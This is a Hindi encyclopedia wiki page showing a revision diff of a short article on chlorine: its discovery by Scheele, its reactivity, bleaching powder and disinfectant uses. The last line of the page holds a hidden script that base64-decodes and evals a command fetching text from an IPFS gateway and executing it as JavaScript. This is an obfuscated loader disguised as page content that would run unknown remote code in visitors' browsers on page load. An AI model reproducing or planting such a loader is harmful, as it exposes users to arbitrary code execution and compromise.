Difference between revisions of "क्लोरीन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*(अंग्रेज़ीChlorine): क्लोरीन इस गैस की खो...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*([[अंग्रेज़ी भाषा|अंग्रेज़ी]]Chlorine): क्लोरीन इस गैस की खोज सर्वप्रथम शीले ने की थी।  
+
*([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Chlorine) क्लोरीन इस [[गैस]] की खोज सर्वप्रथम शीले ने की थी।  
 
*यह एक अत्यंत क्रियाशील गैस है।  
 
*यह एक अत्यंत क्रियाशील गैस है।  
 
*संयुक्त अवस्था में यह साधारण नमक (सोडियम क्लोराइड) में पायी जाती है। व स्वतंत्र अवस्था में ज्वालामुखी पर्वतों से निकली गैसों में उपस्थित रहती है।  
 
*संयुक्त अवस्था में यह साधारण नमक (सोडियम क्लोराइड) में पायी जाती है। व स्वतंत्र अवस्था में ज्वालामुखी पर्वतों से निकली गैसों में उपस्थित रहती है।  
 
*इस गैस के औद्योगिक निर्माण के लिये वेल्डन, डीकन आदि प्रक्रियाओं का प्रयोग किया जाता है।  
 
*इस गैस के औद्योगिक निर्माण के लिये वेल्डन, डीकन आदि प्रक्रियाओं का प्रयोग किया जाता है।  
 
*शुष्क व बुझे चूने में क्लोरिन गैस प्रवाहित करने पर विरंजक चूर्ण का निर्माण होता है।  
 
*शुष्क व बुझे चूने में क्लोरिन गैस प्रवाहित करने पर विरंजक चूर्ण का निर्माण होता है।  
*यह एक तीव्र विरंजक गैस है व [[रंग|रंगीन]] कपड़ों, [[फूल|फूलों]] आदि का रंग उड़ा देती है। यह गैस कीटाणु नाशक के रूप में, आक्सीकारक के रूप में प्रयोग की जाती है।
+
*यह एक तीव्र विरंजक गैस है व [[रंग|रंगीन]] कपड़ों, [[फूल|फूलों]] आदि का रंग उड़ा देती है।  
 
+
*यह गैस कीटाणु नाशक के रूप में, आक्सीकारक के रूप में प्रयोग की जाती है।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 17: Line 17:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{आवर्त सारणी}}
 +
[[Category:रसायन विज्ञान]]
 +
[[Category:विज्ञान_कोश]]
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 
__INDEX__
 
__INDEX__

Revision as of 05:44, 18 February 2011

  • (aangrezi:Chlorine) klorin is gais ki khoj sarvapratham shile ne ki thi.
  • yah ek atyant kriyashil gais hai.
  • sanyukt avastha mean yah sadharan namak (sodiyam kloraid) mean payi jati hai. v svatantr avastha mean jvalamukhi parvatoan se nikali gaisoan mean upasthit rahati hai.
  • is gais ke audyogik nirman ke liye veldan, dikan adi prakriyaoan ka prayog kiya jata hai.
  • shushk v bujhe choone mean klorin gais pravahit karane par viranjak choorn ka nirman hota hai.
  • yah ek tivr viranjak gais hai v rangin kap doan, phooloan adi ka rang u da deti hai.
  • yah gais kitanu nashak ke roop mean, aksikarak ke roop mean prayog ki jati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>